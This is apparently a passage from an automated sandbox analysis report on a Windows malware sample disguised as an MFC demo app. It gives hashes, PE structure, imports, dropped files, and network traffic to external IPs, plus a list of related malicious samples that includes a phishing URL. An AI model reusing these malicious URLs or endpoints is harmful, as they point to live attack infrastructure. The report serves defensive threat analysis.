	bin.sh	Get hash	malicious	Browse	169.173.126.123
	New order.exe	Get hash	malicious	Browse	154.0.163.40
	Review bank details.exe	Get hash	malicious	Browse	154.0.167.156
	3-321-68661.xls	Get hash	malicious	Browse	197.242.151.164
	#20030300COPY.htm	Get hash	malicious	Browse	154.0.175.244
	https://motswedingms.co.za/wp-content/axis/oauth/site/service/demp.php?email=kazou.mvl@cm.be	Get hash	malicious	Browse	154.0.173.185
	#20030300COPY.htm	Get hash	malicious	Browse	154.0.175.244
	DOCX9-29827.doc	Get hash	malicious	Browse	154.0.165.27

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5884411679108142
Encrypted:	false
SSDEEP:	6:bxk1GaD0JOCEfMuaaD0JOCEfMKQmD/h/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bmGaD0JcaaD0JwQQRtAg/0bjSQJ
MD5:	ECA35DA626DE931D98B5F9D45C881F48
SHA1:	5A79A208FDD3A6BBED08B62F1C3C076F8D033F56
SHA-256:	C7E91A5A8098D21DB29A82C59A7B4D75F46155462817CBD66AA5ED280EBC9209
SHA-512:	A8F08FCCA3CD88DEAC7B7AEDEDD8DE2E971BBE8A201C014AC26B8262671E907149F62BA10BC0477434A641F66624C493F1BC877D679C940701BB6069D496F5FD
Malicious:	false
Preview:	....E..h..(.....7....y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................7....y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x61364723, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09293683689330966
Encrypted:	false
SSDEEP:	6:6XGzwl/+Fh+1RIE11Y8TRX2SpFKEXGzwl/+Fh+1RIE11Y8TRX2SpFK:H0+r6O4blxKR0+r6O4blxK
MD5:	CBA0BEBC50A86F7FE7EB9D139CDC12BA
SHA1:	F2897596769E45232041229566E74F93AA257D06
SHA-256:	06EA752C0407DE2F1A68F73EFD6D3DCAE1D32A117C7A33E40841A8CC1E7ABA3F
SHA-512:	037589BEE3162979EEE196A57A03F80380923D63F88FF35ECD121C0B217392ABA043DBEF05954DB2D7CF04550ECD2CBD49F18D3CBCC1DFE39A157114522F6ABB
Malicious:	false
Preview:	a6G#... ................e.f.3...w........................&..........w..7....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..........................................................................................................................................................................................................................................7....y....................#.7....y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.10537731174267641
Encrypted:	false
SSDEEP:	3:ftl1EvStcNkj8l/bJdAtiipWqll:fASuNkj8t4rpf
MD5:	C8B9BA09235D518D392E59E21BC7A290
SHA1:	EB567E3AD7B76C930A95106818DE59DE35774EBB
SHA-256:	A2155CA665534C05848754901FFF63FEE3C19D10BB6202F6E2535EEBEA546109
SHA-512:	846EBCFE05D93FDDA8A4E47CF7D3745D2C0A6CCB4F81679C6F717B25207DF19D9F996FB1C0CFCEC3C10906712930EC1BC30E5B6A62BFDE04A5ED6C564C075159
Malicious:	false
Preview:	.FUn.....................................3...w..7....y.......w...............w.......w....:O.....w....................#.7....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.136946567981312
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3r9mNI9sk9+MlWlLehB4yAq7ejCMmNI91:OaqdmuF3rwNWv+kWReH4yJ7MINW1
MD5:	0844A93C5C624826B331967FE0048B42
SHA1:	7B176C548AB8343D6C30E13D6916350552600BC9
SHA-256:	26E280B32E0B9F5344F72230322FCE26D08348D2975810605743FC1E7D7637BA
SHA-512:	62E4EB5C9E871AF43C706B0172611BDCD8128A1A783F97960B9D4512B3791F1BDD0F74B02289898846D36BA4F7F2091B55B4F57F31702580D67C4D30AF3FB928
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. M.a.r. .. 1.2. .. 2.0.2.1. .1.6.:.2.8.:.0.8.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. M.a.r. .. 1.2. .. 2.0.2.1. .1.6.:.2.8.:.0.8.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.0032331918802715
TrID:	Win32 Executable (generic) a (10002005/4) 99.83% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2ojdmC51As.exe
File size:	376832
MD5:	5804d97670dcdfab88ba830682355dad
SHA1:	65c817fb511824fa185f34ecd744b836ed7a19eb
SHA256:	4e885ada930e285a005c5211b8a652dc0eb11a06ccf530561afa88aefe99c9fc
SHA512:	befd479d37ff5bef768d61aeec101b4f584e8519f4b3d60f6f0692614ce8925a8303ae478b4d21652b64bc36bc38e9df2eb44d874c2f973f310f2e8ff2a0c7a4
SSDEEP:	6144:HzoTjUrx4KVHa9eUfTLHy2VrH0D+wieIMl7lT2IcO/wksAPJLzx:ToCHVcjZwie57l6i/wi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........!..`r..`r..`r..`r..`r..sr..`r..as..`r..arC.`rp.nr..`r..jr..`r..kr..`rK.fr..`rRich..`r................PE..L......_...........

File Icon


Icon Hash:	71b018ccc6577131

Static PE Info

General
Entrypoint:	0x406388
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5F920784 [Thu Oct 22 22:28:20 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	875a1634331d344707689db6d9489063

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0042F100h
push 00409800h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [0042B2CCh]
xor edx, edx
mov dl, ah
mov dword ptr [00439D04h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [00439D00h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [00439CFCh], ecx
shr eax, 10h
mov dword ptr [00439CF8h], eax
push 00000001h
call 00007F142CAD7E8Eh
pop ecx
test eax, eax
jne 00007F142CAD690Ah
push 0000001Ch
call 00007F142CAD69C8h
pop ecx
call 00007F142CAD92F9h
test eax, eax
jne 00007F142CAD690Ah
push 00000010h
call 00007F142CAD69B7h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007F142CAD9B32h
call dword ptr [0042B1D0h]
mov dword ptr [0043B87Ch], eax
call 00007F142CAD99F0h
mov dword ptr [00439CE8h], eax
call 00007F142CAD9799h
call 00007F142CAD96DBh
call 00007F142CAD6AECh
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [0042B1D4h]
call 00007F142CAD966Ch
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007F142CAD6908h
movzx eax, word ptr [ebp+00h]

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720
[C++] VS98 (6.0) build 8168

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x33a68	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x23812	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x5c8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29ef1	0x2a000	False	0.574718656994	data	6.56296579611	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0xa8be	0xb000	False	0.309792258523	data	4.42786700159	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x36000	0x5890	0x2000	False	0.253784179688	data	3.64382398996	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x3c000	0x23812	0x24000	False	0.909579806858	data	7.73501222548	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x3c8e0	0x134	data	English	United States
RT_CURSOR	0x3ca14	0xb4	data	English	United States
RT_CURSOR	0x3cac8	0x134	data	English	United States
RT_CURSOR	0x3cbfc	0xb4	data	English	United States
RT_ICON	0x3ccb0	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	English	United States
RT_ICON	0x3cf98	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x3d0c0	0x2e8	data	English	United States
RT_ICON	0x3d3a8	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_MENU	0x3d4d0	0x23e	data	English	United States
RT_STRING	0x3d710	0x90	data	English	United States
RT_STRING	0x3d7a0	0x3e	data	English	United States
RT_STRING	0x3d7e0	0x296	data	English	United States
RT_STRING	0x3da78	0x260	data	English	United States
RT_STRING	0x3dcd8	0x328	data	English	United States
RT_STRING	0x3e000	0x70	data	English	United States
RT_STRING	0x3e070	0x106	data	English	United States
RT_STRING	0x3e178	0xda	data	English	United States
RT_STRING	0x3e254	0x46	data	English	United States
RT_STRING	0x3e29c	0xc6	data	English	United States
RT_STRING	0x3e364	0x1f8	data	English	United States
RT_STRING	0x3e55c	0x86	data	English	United States
RT_STRING	0x3e5e4	0xd0	data	English	United States
RT_STRING	0x3e6b4	0x2a	data	English	United States
RT_STRING	0x3e6e0	0x14a	data	English	United States
RT_STRING	0x3e82c	0x124	data	English	United States
RT_STRING	0x3e950	0x4e2	data	English	United States
RT_STRING	0x3ee34	0x2a2	data	English	United States
RT_STRING	0x3f0d8	0x2dc	data	English	United States
RT_STRING	0x3f3b4	0xac	data	English	United States
RT_STRING	0x3f460	0xde	data	English	United States
RT_STRING	0x3f540	0x4c4	data	English	United States
RT_STRING	0x3fa04	0x264	data	English	United States
RT_STRING	0x3fc68	0x2c	data	English	United States
RT_ACCELERATOR	0x3fc94	0x70	data	English	United States
RT_ACCELERATOR	0x3fd04	0x18	data	English	United States
RT_RCDATA	0x3fd1c	0x1f733	data	English	United States
RT_GROUP_CURSOR	0x5f450	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_CURSOR	0x5f474	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_ICON	0x5f498	0x22	data	English	United States
RT_GROUP_ICON	0x5f4bc	0x22	data	English	United States
RT_VERSION	0x5f4e0	0x314	data	English	United States
None	0x5f7f4	0x1e	data	English	United States

Imports

DLL	Import
KERNEL32.dll	VirtualFree, IsBadWritePtr, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapCreate, IsBadCodePtr, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, HeapDestroy, GetACP, HeapSize, HeapReAlloc, RaiseException, TerminateProcess, ExitProcess, GetCommandLineA, GetStartupInfoA, HeapFree, InterlockedExchange, GetLocalTime, GetSystemTime, GetTimeZoneInformation, RtlUnwind, HeapAlloc, FileTimeToLocalFileTime, FileTimeToSystemTime, SetErrorMode, SystemTimeToFileTime, LocalFileTimeToFileTime, GetFileSize, GetVolumeInformationA, FindFirstFileA, FindClose, DeleteFileA, MoveFileA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileA, DuplicateHandle, GetOEMCP, GetCPInfo, GetProcessVersion, WritePrivateProfileStringA, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalFree, LocalAlloc, WideCharToMultiByte, InterlockedIncrement, GlobalFlags, InterlockedDecrement, GetLastError, SetLastError, MulDiv, lstrlenA, MultiByteToWideChar, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetFullPathNameA, GetTempFileNameA, lstrcpynA, GetFileAttributesA, FreeLibrary, GetVersion, lstrcatA, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, lstrcpyA, GetModuleHandleA, CloseHandle, GetModuleFileNameA, GlobalAlloc, GlobalDeleteAtom, lstrcmpiA, GetCurrentThread, GetCurrentThreadId, lstrcmpA, GlobalLock, GlobalUnlock, GlobalFree, LockResource, FindResourceA, LoadResource, GetTickCount, Sleep, LoadLibraryA, VirtualAlloc, GetModuleHandleExA, GetProcAddress, GetCurrentProcess, IsBadReadPtr
USER32.dll	TranslateAcceleratorA, ReleaseCapture, GetDesktopWindow, DestroyMenu, LoadMenuA, SetMenu, ReuseDDElParam, UnpackDDElParam, BringWindowToTop, ClientToScreen, GetWindowDC, BeginPaint, EndPaint, TabbedTextOutA, DrawTextA, GrayStringA, IsZoomed, SetParent, IsRectEmpty, AppendMenuA, DeleteMenu, GetSystemMenu, GetClassNameA, GetSysColorBrush, LoadStringA, CharUpperA, FindWindowA, GetTabbedTextExtentA, KillTimer, WindowFromPoint, InflateRect, SetCapture, InvertRect, GetDCEx, LockWindowUpdate, GetDC, ReleaseDC, LoadCursorA, DestroyCursor, ShowWindow, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, LoadIconA, UpdateWindow, SendDlgItemMessageA, MapWindowPoints, GetSysColor, SetFocus, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, BeginDeferWindowPos, CopyRect, EndDeferWindowPos, ScrollWindow, GetScrollInfo, LoadAcceleratorsA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, GetTopWindow, IsChild, GetCapture, WinHelpA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenu, GetMenuItemCount, GetSubMenu, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, DefWindowProcA, CreateWindowExA, GetClassLongA, SetPropA, UnhookWindowsHookEx, GetPropA, CallWindowProcA, RemovePropA, GetMessageTime, GetMessagePos, GetForegroundWindow, SetForegroundWindow, GetWindow, SetWindowLongA, SetWindowPos, RegisterWindowMessageA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuA, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, GetFocus, GetKeyState, CallNextHookEx, ValidateRect, IsWindowVisible, GetCursorPos, SetWindowsHookExA, GetLastActivePopup, MessageBoxA, SetCursor, ShowOwnedPopups, PostMessageA, PostQuitMessage, GetNextDlgTabItem, EndDialog, GetActiveWindow, SetActiveWindow, IsWindow, GetSystemMetrics, CreateDialogIndirectParamA, DestroyWindow, GetParent, GetWindowLongA, GetDlgItem, IsWindowEnabled, SetRectEmpty, PtInRect, FillRect, SetScrollInfo, SetRect, SendMessageA, PeekMessageA, GetMessageA, TranslateMessage, DispatchMessageA, SetTimer, InvalidateRect, GetClientRect, LoadBitmapA, EnableWindow, GetMenuItemID, UnregisterClassA
GDI32.dll	GetDeviceCaps, PatBlt, GetStockObject, Rectangle, DPtoLP, CreatePen, GetViewportOrgEx, AbortDoc, EndDoc, EndPage, StartPage, StartDocA, SetAbortProc, CreateDCA, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, MoveToEx, LineTo, SetTextAlign, GetCurrentPositionEx, GetObjectA, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, CreateSolidBrush, CreatePatternBrush, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, GetTextExtentPoint32A, GetTextMetricsA, StretchDIBits, GetCharWidthA, CreateFontA, CreateFontIndirectA, LPtoDP, GetBkColor, GetNearestColor, GetTextColor, GetStretchBltMode, GetPolyFillMode, GetTextAlign, GetBkMode, GetROP2, GetTextFaceA, GetWindowOrgEx, SetRectRgn, CombineRgn, CreateRectRgnIndirect, SetTextColor, SetBkColor, GetClipBox, CreateBitmap, CreateCompatibleBitmap, SelectObject, StretchBlt, DeleteObject, DeleteDC, BitBlt, CreateCompatibleDC
comdlg32.dll	GetFileTitleA, PrintDlgA, CommDlgExtendedError, GetSaveFileNameA, GetOpenFileNameA
WINSPOOL.DRV	OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll	RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegCloseKey, GetFileSecurityA, SetFileSecurityA, RegSetValueExA
SHELL32.dll	DragQueryFileA, DragFinish
COMCTL32.dll

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2003
InternalName	EffectDemo
FileVersion	1, 0, 0, 1
CompanyName
LegalTrademarks
ProductName	EffectDemo Application
ProductVersion	1, 0, 0, 1
FileDescription	EffectDemo MFC Application
OriginalFilename	EffectDemo.EXE
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2021 16:26:58.447586060 CET	49718	443	192.168.2.5	200.116.145.225
Mar 12, 2021 16:27:01.460962057 CET	49718	443	192.168.2.5	200.116.145.225
Mar 12, 2021 16:27:07.461484909 CET	49718	443	192.168.2.5	200.116.145.225
Mar 12, 2021 16:27:22.953353882 CET	49723	8080	192.168.2.5	96.126.101.6
Mar 12, 2021 16:27:23.155994892 CET	8080	49723	96.126.101.6	192.168.2.5
Mar 12, 2021 16:27:23.664577007 CET	49723	8080	192.168.2.5	96.126.101.6
Mar 12, 2021 16:27:23.867755890 CET	8080	49723	96.126.101.6	192.168.2.5
Mar 12, 2021 16:27:24.370033979 CET	49723	8080	192.168.2.5	96.126.101.6
Mar 12, 2021 16:27:24.571486950 CET	8080	49723	96.126.101.6	192.168.2.5
Mar 12, 2021 16:27:27.230458021 CET	49724	8080	192.168.2.5	5.196.108.185
Mar 12, 2021 16:27:27.280580044 CET	8080	49724	5.196.108.185	192.168.2.5
Mar 12, 2021 16:27:27.280803919 CET	49724	8080	192.168.2.5	5.196.108.185
Mar 12, 2021 16:27:27.281419992 CET	49724	8080	192.168.2.5	5.196.108.185
Mar 12, 2021 16:27:27.281521082 CET	49724	8080	192.168.2.5	5.196.108.185
Mar 12, 2021 16:27:27.331361055 CET	8080	49724	5.196.108.185	192.168.2.5
Mar 12, 2021 16:27:27.331389904 CET	8080	49724	5.196.108.185	192.168.2.5
Mar 12, 2021 16:27:27.331406116 CET	8080	49724	5.196.108.185	192.168.2.5
Mar 12, 2021 16:27:27.331490993 CET	8080	49724	5.196.108.185	192.168.2.5
Mar 12, 2021 16:27:27.332134008 CET	49724	8080	192.168.2.5	5.196.108.185
Mar 12, 2021 16:27:30.959634066 CET	49728	8080	192.168.2.5	167.114.153.111
Mar 12, 2021 16:27:31.091815948 CET	8080	49728	167.114.153.111	192.168.2.5
Mar 12, 2021 16:27:31.602680922 CET	49728	8080	192.168.2.5	167.114.153.111
Mar 12, 2021 16:27:31.736118078 CET	8080	49728	167.114.153.111	192.168.2.5
Mar 12, 2021 16:27:32.243485928 CET	49728	8080	192.168.2.5	167.114.153.111
Mar 12, 2021 16:27:32.375684977 CET	8080	49728	167.114.153.111	192.168.2.5
Mar 12, 2021 16:27:34.950972080 CET	49729	443	192.168.2.5	194.187.133.160
Mar 12, 2021 16:27:35.035270929 CET	443	49729	194.187.133.160	192.168.2.5
Mar 12, 2021 16:27:35.541098118 CET	49729	443	192.168.2.5	194.187.133.160
Mar 12, 2021 16:27:35.625196934 CET	443	49729	194.187.133.160	192.168.2.5
Mar 12, 2021 16:27:36.134251118 CET	49729	443	192.168.2.5	194.187.133.160
Mar 12, 2021 16:27:36.218451977 CET	443	49729	194.187.133.160	192.168.2.5
Mar 12, 2021 16:27:38.503649950 CET	49735	80	192.168.2.5	98.174.164.72
Mar 12, 2021 16:27:41.556896925 CET	49735	80	192.168.2.5	98.174.164.72
Mar 12, 2021 16:27:47.572745085 CET	49735	80	192.168.2.5	98.174.164.72
Mar 12, 2021 16:27:57.331772089 CET	8080	49724	5.196.108.185	192.168.2.5
Mar 12, 2021 16:27:57.331887960 CET	49724	8080	192.168.2.5	5.196.108.185
Mar 12, 2021 16:28:03.714349985 CET	49747	8080	192.168.2.5	103.86.49.11
Mar 12, 2021 16:28:06.715009928 CET	49747	8080	192.168.2.5	103.86.49.11
Mar 12, 2021 16:28:12.731170893 CET	49747	8080	192.168.2.5	103.86.49.11
Mar 12, 2021 16:28:27.509466887 CET	49748	8080	192.168.2.5	78.24.219.147
Mar 12, 2021 16:28:30.513876915 CET	49748	8080	192.168.2.5	78.24.219.147
Mar 12, 2021 16:28:36.530047894 CET	49748	8080	192.168.2.5	78.24.219.147
Mar 12, 2021 16:28:48.328850031 CET	49724	8080	192.168.2.5	5.196.108.185
Mar 12, 2021 16:28:48.380722046 CET	8080	49724	5.196.108.185	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2021 16:26:31.658188105 CET	53784	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:31.709811926 CET	53	53784	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:32.969959021 CET	65307	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:33.009445906 CET	64344	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:33.020936012 CET	53	65307	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:33.062737942 CET	53	64344	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:33.092528105 CET	62060	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:33.144085884 CET	53	62060	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:33.978004932 CET	61805	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:34.026830912 CET	53	61805	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:34.754923105 CET	54795	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:34.808681011 CET	53	54795	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:35.552190065 CET	49557	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:35.612155914 CET	53	49557	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:35.815581083 CET	61733	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:35.874965906 CET	53	61733	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:36.903786898 CET	65447	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:36.952532053 CET	53	65447	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:38.123769999 CET	52441	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:38.174591064 CET	53	52441	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:39.035057068 CET	62176	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:39.085207939 CET	53	62176	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:39.971512079 CET	59596	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:40.031546116 CET	53	59596	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:40.905356884 CET	65296	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:40.970282078 CET	53	65296	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:41.698667049 CET	63183	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:41.756468058 CET	53	63183	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:42.755387068 CET	60151	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:42.804197073 CET	53	60151	8.8.8.8	192.168.2.5
Mar 12, 2021 16:26:58.430424929 CET	56969	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:26:58.491851091 CET	53	56969	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:09.681801081 CET	55161	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:09.733831882 CET	53	55161	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:18.314511061 CET	54757	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:18.373548985 CET	53	54757	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:27.852175951 CET	49992	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:27.909488916 CET	53	49992	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:30.678214073 CET	60075	53	192.168.2.5	8.8.8.8
Mar 12, 2021 16:27:30.727032900 CET	53	60075	8.8.8.8	192.168.2.5
Mar 12, 2021 16:27:35.550229073 CET	55016	53	192.168.2.5	8.8.8.8
